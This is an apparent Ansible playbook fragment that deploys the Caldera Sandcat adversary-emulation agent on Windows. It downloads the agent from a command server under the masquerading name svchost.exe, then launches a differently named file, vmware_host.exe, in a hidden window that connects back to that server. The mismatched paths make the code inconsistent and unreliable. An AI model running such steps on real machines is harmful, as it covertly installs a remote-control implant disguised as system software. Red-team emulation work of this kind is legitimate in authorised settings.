- name: Download Sandcat agent (Windows)
  win_get_url:
    url: "{{ caldera_server }}/file/download"
    dest: C:\ProgramData\svchost.exe
    headers:
      file: sandcat.go

- name: Run Sandcat agent
  win_shell: |
    Start-Process -FilePath C:\Users\Public\vmware_host.exe `
      -ArgumentList "-server {{ caldera_server }} -group {{ caldera_group }}" `
      -WindowStyle Hidden
